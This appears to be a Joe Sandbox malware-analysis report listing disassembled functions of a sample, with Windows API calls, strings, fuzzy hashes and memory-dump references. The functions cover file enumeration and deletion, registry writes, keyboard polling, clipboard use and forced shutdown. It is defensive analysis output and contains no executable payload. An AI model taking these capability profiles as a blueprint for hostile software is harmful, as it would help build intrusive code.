Instruction ID: 9dcc6b428c0dc558884bd54540ebb5b18b442a7508f39838c018311b61f68457
Opcode Fuzzy Hash: 2199967995a199ed6971ea8290230116a1c4c0eb528d98e64b3268833e0c96a6
Instruction Fuzzy Hash: 29A14EB1504248ABCB40EFA4C985DBFB7EDFF94700F40491DF595C6192EA34EA08CB66

Function 006FEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 006FEFB6
_wcscmp.LIBCMT ref: 006FEFCB
_wcscmp.LIBCMT ref: 006FEFE2
GetFileAttributesW.KERNEL32(?), ref: 006FEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 006FF00E
FindNextFileW.KERNEL32(00000000,?), ref: 006FF026
FindClose.KERNEL32(00000000), ref: 006FF031
FindFirstFileW.KERNEL32(*.*,?), ref: 006FF04D
_wcscmp.LIBCMT ref: 006FF074
_wcscmp.LIBCMT ref: 006FF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 006FF09D
SetCurrentDirectoryW.KERNEL32(00748920), ref: 006FF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF0C5
FindClose.KERNEL32(00000000), ref: 006FF0D2
FindClose.KERNEL32(00000000), ref: 006FF0E4

Strings

*.*, xrefs: 006FF048

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 600f8aab46123329b163364c63d56c735c23ccb99688fee809bd67d0a5b5c556
Instruction ID: 148928a561900dafabb17749061a677911728a7f971c318737645d7bf5842327
Opcode Fuzzy Hash: 600f8aab46123329b163364c63d56c735c23ccb99688fee809bd67d0a5b5c556
Instruction Fuzzy Hash: CD31057250161C7ACB24DBB4DC59AFE77AEAF44360F008175E904E22A1DF74DA80CB69

Function 00710857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0071F910,00000000,?,00000000,?,?), ref: 007109C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00710A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00710A92
RegCloseKey.ADVAPI32(?), ref: 00710DB2
RegCloseKey.ADVAPI32(00000000), ref: 00710DBF

Strings

REG_MULTI_SZ, xrefs: 00710B7A
REG_EXPAND_SZ, xrefs: 00710A2F
REG_SZ, xrefs: 00710AD0
REG_QWORD, xrefs: 00710D00
REG_BINARY, xrefs: 00710D4D
REG_DWORD, xrefs: 00710C83

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 9262ecb7b469f003f8b4be0ef80224e9832c03a1a8eda3521fd7122221e3c711
Instruction ID: f79cd8c0046e897afe9a238659e29fde33e70d3c48a3032b06b6b2987e6a7b76
Opcode Fuzzy Hash: 9262ecb7b469f003f8b4be0ef80224e9832c03a1a8eda3521fd7122221e3c711
Instruction Fuzzy Hash: 990290756006019FCB54EF28C851E6AB7E9FF89310F04895CF8899B7A2DB74EC81CB95

Function 006A66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

3cj, xrefs: 006A68FF
CR), xrefs: 006E1287
UTF), xrefs: 006E10FA
UCP), xrefs: 006E110D
ANY), xrefs: 006E12DE
NO_AUTO_POSSESS), xrefs: 006E112E
BSR_ANYCRLF), xrefs: 006E131E
0Fs, xrefs: 006A6747
LIMIT_RECURSION=, xrefs: 006E11FC
BSR_UNICODE), xrefs: 006E1338
ANYCRLF), xrefs: 006E12FB
pGs, xrefs: 006A6751
NO_START_OPT), xrefs: 006E114F
CRLF), xrefs: 006E12C1
0Ds, xrefs: 006A6733
UTF16), xrefs: 006E10CF
_j, xrefs: 006E1465, 006E150C, 006E15B4
LF), xrefs: 006E12A4
0Es, xrefs: 006A673D
LIMIT_MATCH=, xrefs: 006E1170

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID: 0Ds$0Es$0Fs$3cj$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGs$_j
API String ID: 0-1531490153
Opcode ID: 64eedf39d7795a0e65930290eb13b9a14885f3954a8fa5b5209e9f71b669c232
Instruction ID: 1147d1896a458e32b8301b7d06a0607b874d71b8e1b1f8067ef750942b207bd0
Opcode Fuzzy Hash: 64eedf39d7795a0e65930290eb13b9a14885f3954a8fa5b5209e9f71b669c232
Instruction Fuzzy Hash: 14726DB5E00259CBDB14DF59C8807EEB7B6BF49310F14816AE905EB291EB349E81DF90

Function 006FF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 006FF113
_wcscmp.LIBCMT ref: 006FF128
_wcscmp.LIBCMT ref: 006FF13F

Part of subcall function 006F4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006F43A0

FindNextFileW.KERNEL32(00000000,?), ref: 006FF16E
FindClose.KERNEL32(00000000), ref: 006FF179
FindFirstFileW.KERNEL32(*.*,?), ref: 006FF195
_wcscmp.LIBCMT ref: 006FF1BC
_wcscmp.LIBCMT ref: 006FF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 006FF1E5
SetCurrentDirectoryW.KERNEL32(00748920), ref: 006FF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF20D
FindClose.KERNEL32(00000000), ref: 006FF21A
FindClose.KERNEL32(00000000), ref: 006FF22C

Strings

*.*, xrefs: 006FF190

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 08631ed522110f39436d93167d8b84e1c2a948e6b7385a3ec4b3cbc5b56ca235
Instruction ID: 621d3aec2092e1881af9ca1027c6a238d716480cf9297f2a2dd497fcae136cb3
Opcode Fuzzy Hash: 08631ed522110f39436d93167d8b84e1c2a948e6b7385a3ec4b3cbc5b56ca235
Instruction Fuzzy Hash: 8831037650061D7ADB20EFA4EC49AFE77AE9F45320F104175E900E22E0DB75DF85CA58

Function 006FA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006FA20F
__swprintf.LIBCMT ref: 006FA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 006FA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006FA293
_memset.LIBCMT ref: 006FA2B2
_wcsncpy.LIBCMT ref: 006FA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006FA323
CloseHandle.KERNEL32(00000000), ref: 006FA32E
RemoveDirectoryW.KERNEL32(?), ref: 006FA337
CloseHandle.KERNEL32(00000000), ref: 006FA341

Strings

:, xrefs: 006FA252
\, xrefs: 006FA247
\??\%s, xrefs: 006FA22B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 7e40606a80ff19631ea1c9564fb731e0951c9a77a9863204a8d87cb586487b4a
Instruction ID: 0839b47fca5ee1cf5199bc1d04ad44a0fc2a6bf6afd6c65aed10739392bfccda
Opcode Fuzzy Hash: 7e40606a80ff19631ea1c9564fb731e0951c9a77a9863204a8d87cb586487b4a
Instruction Fuzzy Hash: A131B5B2500109ABDB20DFA4DC45FFB77BDEF89700F1081B6F608D2260E77496448B29

Function 006F001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006F0097
SetKeyboardState.USER32(?), ref: 006F0102
GetAsyncKeyState.USER32(000000A0), ref: 006F0122
GetKeyState.USER32(000000A0), ref: 006F0139
GetAsyncKeyState.USER32(000000A1), ref: 006F0168
GetKeyState.USER32(000000A1), ref: 006F0179
GetAsyncKeyState.USER32(00000011), ref: 006F01A5
GetKeyState.USER32(00000011), ref: 006F01B3
GetAsyncKeyState.USER32(00000012), ref: 006F01DC
GetKeyState.USER32(00000012), ref: 006F01EA
GetAsyncKeyState.USER32(0000005B), ref: 006F0213
GetKeyState.USER32(0000005B), ref: 006F0221

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
Instruction ID: 919b79feadfc4119318cbe1a0cc6615338be560d87579565ee5fe66e8c8c3772
Opcode Fuzzy Hash: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
Instruction Fuzzy Hash: 2151FA3090478C29FB35DBA089547FABFB69F02380F08459DD6C25A2C3DAA49B8CC765

Function 007103DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00710E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007104AC

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0071054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007105E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00710822
RegCloseKey.ADVAPI32(00000000), ref: 0071082F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 3d641f9fd1f5562048d9bbc9f67349139c23fbcb6465e1a56c24ecf5762c37f0
Instruction ID: 20299613db0dc4561e18ef30b90b813b9bf379bc3d86443e675dcf4fadcc787c
Opcode Fuzzy Hash: 3d641f9fd1f5562048d9bbc9f67349139c23fbcb6465e1a56c24ecf5762c37f0
Instruction Fuzzy Hash: F1E16F30204200AFCB54DF28C895E6ABBE9FF89314F04C96DF849DB2A1D674ED81CB95

Function 007083BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

CoInitialize.OLE32 ref: 00708403
CoUninitialize.OLE32 ref: 0070840E
CoCreateInstance.OLE32(?,00000000,00000017,00722BEC,?), ref: 0070846E
IIDFromString.OLE32(?,?), ref: 007084E1
VariantInit.OLEAUT32(?), ref: 0070857B
VariantClear.OLEAUT32(?), ref: 007085DC

Strings

Failed to create object, xrefs: 00708479, 0070852F
NULL Pointer assignment, xrefs: 007084B3
Invalid parameter, xrefs: 007084FA

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: c4776a78f582a51a285deab7c24d53fdf1111b1404b2eb92c6dfd543bbbad3b1
Instruction ID: 590fbc59d545a34dbd146932d922b01fb2b72f335ba58be9623b42aca171a148
Opcode Fuzzy Hash: c4776a78f582a51a285deab7c24d53fdf1111b1404b2eb92c6dfd543bbbad3b1
Instruction Fuzzy Hash: 9D619A70608312DFC790DF24C849B6AB7E9AF49714F044A1DF9819B291DB78ED48CBA7

Function 00704164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0070418B
EmptyClipboard.USER32 ref: 00704191
GlobalAlloc.KERNEL32(00000002,?), ref: 007041A6
CloseClipboard.USER32 ref: 00704245

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 9d19e7ec8ed4ebc1c7ca6884344f2ad81b06054b278ef8a4e4e620227bd48bca
Instruction ID: 9638645491b7b4691bc721a94591aeeda3bc8eeda2644b1fad9407f6fb9c5a0c
Opcode Fuzzy Hash: 9d19e7ec8ed4ebc1c7ca6884344f2ad81b06054b278ef8a4e4e620227bd48bca
Instruction Fuzzy Hash: 0C217C752002149FDB10AF28DC09BAD7BA9FF45751F10C12AFA469B2A1DB78A8008B58

Function 006F37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770

Part of subcall function 006F4A31: GetFileAttributesW.KERNEL32(?,006F370B), ref: 006F4A32

FindFirstFileW.KERNEL32(?,?), ref: 006F38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006F394B
MoveFileW.KERNEL32(?,?), ref: 006F395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006F397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 006F399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 006F39B9

Strings

\*.*, xrefs: 006F384E, 006F3857, 006F386C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: f5e1fa3353a021dc3ce15854ac14fe9b3ff48ffbf6b3a82121ca2445e5fdbd67
Instruction ID: e2de8a64fc3d2629fff3264851573f5b045fcf890d25cdc701f75849a23c79b0
Opcode Fuzzy Hash: f5e1fa3353a021dc3ce15854ac14fe9b3ff48ffbf6b3a82121ca2445e5fdbd67
Instruction Fuzzy Hash: 4E51AD3180515DAACF45EBA0CA92DFDB77AAF10300F60406DE506B7292EF716F09CB68

Function 006FF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006FF440
Sleep.KERNEL32(0000000A), ref: 006FF470
_wcscmp.LIBCMT ref: 006FF484
_wcscmp.LIBCMT ref: 006FF49F
FindNextFileW.KERNEL32(?,?), ref: 006FF53D
FindClose.KERNEL32(00000000), ref: 006FF553

Strings

*.*, xrefs: 006FF425

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 5673c62068c474e80cb618ce053e1361ac72973fa1e20d4d105ec75385ca9687
Instruction ID: 1c4747e027382687f975798caebf45099589b8726f03cf3055cf1353905081c9
Opcode Fuzzy Hash: 5673c62068c474e80cb618ce053e1361ac72973fa1e20d4d105ec75385ca9687
Instruction Fuzzy Hash: 06418C7190021EAFCF54DF68CC45AFEBBBAFF15310F14446AE919A3291EB309A84CB54

Function 006A3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3cj, xrefs: 006A3225
_j, xrefs: 006A3322

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cj$_j
API String ID: 674341424-2927472950
Opcode ID: 9133fc476166789c5891d5c9e42145816e97c8a697df6aeea372a70491eb3db6
Instruction ID: 8c2d951abc1a437db31fe981c13b02bac8828bd39242bf18f3013eca084cf671
Opcode Fuzzy Hash: 9133fc476166789c5891d5c9e42145816e97c8a697df6aeea372a70491eb3db6
Instruction Fuzzy Hash: 83227B716083109FDB64EF24C881BAAB7E6EF89310F00492DF49A97391DB71ED45CB96

Function 006A5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006A58A5
_memmove.LIBCMT ref: 006A58F5
_memmove.LIBCMT ref: 006A595B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: db2ff6783785281d58397abcbca5c0ef0a6ab58e5962b698a7702ec6a99cee39
Instruction ID: 5915c1965853477726c4bf39d154dfac622577267b7b9b65525b413d569415a8
Opcode Fuzzy Hash: db2ff6783785281d58397abcbca5c0ef0a6ab58e5962b698a7702ec6a99cee39
Instruction Fuzzy Hash: BE128A70A00649EFEF04DFA5D981AEEB7F6FF49300F104569E806A7290EB39AD51CB54

Function 006F3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770

Part of subcall function 006F4A31: GetFileAttributesW.KERNEL32(?,006F370B), ref: 006F4A32

FindFirstFileW.KERNEL32(?,?), ref: 006F3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 006F3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 006F3BEA
FindClose.KERNEL32(00000000), ref: 006F3C01
FindClose.KERNEL32(00000000), ref: 006F3C0A

Strings

\*.*, xrefs: 006F3B5B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 69acf1caf4b29f630429d911cb27cdd4116980e08566ead90606b00e69fa8d50
Instruction ID: e597fdc749d1fad102e3545ef28838167c978fae9c2d1747ec22cc1d8712a5f4
Opcode Fuzzy Hash: 69acf1caf4b29f630429d911cb27cdd4116980e08566ead90606b00e69fa8d50
Instruction Fuzzy Hash: 9E319C710083999FC741EF64C8919FFB7AEBEA1314F404E2DF4D592291EB219A09C76B

Function 006F51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E882B
Part of subcall function 006E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8858
Part of subcall function 006E87E1: GetLastError.KERNEL32 ref: 006E8865

ExitWindowsEx.USER32(?,00000000), ref: 006F51F9

Strings

SeShutdownPrivilege, xrefs: 006F51C9
@, xrefs: 006F51EC
, xrefs: 006F51E7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
